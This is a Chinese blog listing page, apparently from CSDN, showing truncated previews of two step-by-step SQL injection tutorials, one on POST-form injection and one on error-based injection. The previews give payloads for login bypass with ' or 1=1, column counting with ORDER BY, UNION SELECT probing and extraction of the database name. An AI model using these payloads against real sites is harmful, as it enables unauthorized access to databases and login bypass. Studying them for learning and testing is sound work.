- 博客(2)
- 收藏
- 关注
原创 手把手教你挖POST注入
POST注入高危点:登录框、查询框、等各种和数据库有交互的框 1、判断是否存在sql注入先用万能密码登陆试试看 ' or 1=1 -- qwe 2、登陆成功证明存在sql注入,下面在判断字段数 ' or 1=1 order by 3 -- qwe 1到3返回正常 4返回错误 3、 现在在判断回显点 ' and 1=1 union select 1,2,3 -- qwe 回显点是2,3 4、查询当前数据库名 ' and 1=1 un...
2022-05-01 12:59:14
528
原创 手把手教你挖显错注入
and 1=1 页面返回正常 and 1=2 页面返回错误 证明存在SQL注入 2.判断字段长度 order by 3 1到3有页面返回正常 order by 4 页面返回错误 证明存在3个字段 3.通过联合查询判断输出点 union select 1,2,3 根据页面回显2,3存在注入点 4.查数据库名 union select 1,2,database() 通过页面回显查出数据库名orror 5.查...
2022-04-30 18:59:29
688
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人